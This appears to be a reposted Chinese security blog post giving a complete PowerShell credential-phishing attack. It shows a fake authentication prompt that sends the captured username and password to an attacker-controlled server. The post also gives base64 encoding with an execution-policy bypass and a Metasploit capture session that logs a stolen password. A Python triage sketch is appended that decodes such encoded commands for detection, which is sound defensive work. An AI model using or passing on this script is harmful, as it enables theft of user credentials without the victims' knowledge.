Powershell Popups + Capture (WOOYUN)

五道口杀气 Powershell Popups + Capture  (WOOYUN) | 2015-01-13 18:17

from:http://www.room362.com/blog/2015/01/12/powershell-popups-plus-capture/

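The advantage of this method is that it creates no files and can capture the credentials of a user at any privilege level.

It requires no administrator privileges and no UAC bypass.

The principle is to use a PowerShell script to present a fake login prompt; once the administrator logs in, the password is sent to our server.
Metasploit is used here to receive the password.

PowerShell script: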

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');

172.16.102.163 is the address where we receive the credentials.

cat power.txt | iconv --to-code UTF-16LE | base64

This encodes the script as base64.

Then run:

powershell -ep bypass -enc <base64-encoded code>

Receiving the password with Metasploit:

root@wpad:~/metasploit-framework# ./msfconsole -Lq
msf > use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) > show options

Module options (auxiliary/server/capture/http_basic):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   REALM        Secure Site      yes       The authentication realm you'd like to present.
   RedirectURL                   no        The page to redirect users to after they enter basic auth creds
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      80               yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion   SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                       no        The URI to use for this exploit (default is random)

msf auxiliary(http_basic) > set SSL true
SSL => true
msf auxiliary(http_basic) > set SRVPORT 443
SRVPORT => 443
msf auxiliary(http_basic) > set URIPATH /
URIPATH => /
msf auxiliary(http_basic) > run
[*] Auxiliary module execution completed
msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:443...
[*] Using URL: https://0.0.0.0:443/
[*]  Local IP: https://172.16.102.163:443/
[*] Server started.
[*] 172.16.102.140   http_basic - Sending 401 to client 172.16.102.140
[+] 172.16.102.140 - Credential collected: "SITTINGDUCK\user:ASDqwe123" => /
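
A defender-side triage sketch for the `-enc` launch shown above, added here as an example and not part of the original post or of room362's article: it decodes the base64/UTF-16LE argument from a process command line and reports which strings from the page's script appear in it. The function names, indicator labels and sample command lines are constructed for illustration.

```python
import base64
import binascii
import re

# Strings from the script on this page, matched case-insensitively after decoding.
INDICATORS = {
    "credential_prompt": "promptforcredential",
    "plaintext_password_access": "getnetworkcredential",
    "tls_validation_disabled": "servercertificatevalidationcallback",
    "web_client": "net.webclient",
}
FLAG = re.compile(r"(?<!\S)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)

def encode(script):
    """Same transform as the iconv/base64 step on the page; builds test input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline):
    """Return the script carried by an encoded-command switch, or None."""
    for name, blob in FLAG.findall(cmdline):
        # Prefixes of -EncodedCommand and -ec are accepted; -ep is ExecutionPolicy.
        if not ("encodedcommand".startswith(name.lower()) or name.lower() == "ec"):
            continue
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None  # not valid base64, or not UTF-16LE text
    return None

def triage(cmdline):
    """Return the sorted indicator names found in the decoded payload."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return []
    return sorted(k for k, v in INDICATORS.items() if v in script.lower())

def is_credential_phish(cmdline):
    """Flag a credential prompt combined with an outbound web client."""
    hits = triage(cmdline)
    return "credential_prompt" in hits and "web_client" in hits

# Constructed command lines standing in for process-creation log fields.
SAMPLES = [
    "powershell -ep bypass -enc " + encode(
        "$cred = $host.ui.promptforcredential(...); $wc = new-object net.webclient;"),
    "powershell.exe -NoProfile -EncodedCommand " + encode("Get-Service | Out-Null"),
    "powershell -ep bypass -File C:\\scripts\\backup.ps1",
]
```

Run `is_credential_phish` over the command-line field of process-creation events; the literal-string matching only covers the script as it appears on this page, so treat a miss as inconclusive.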
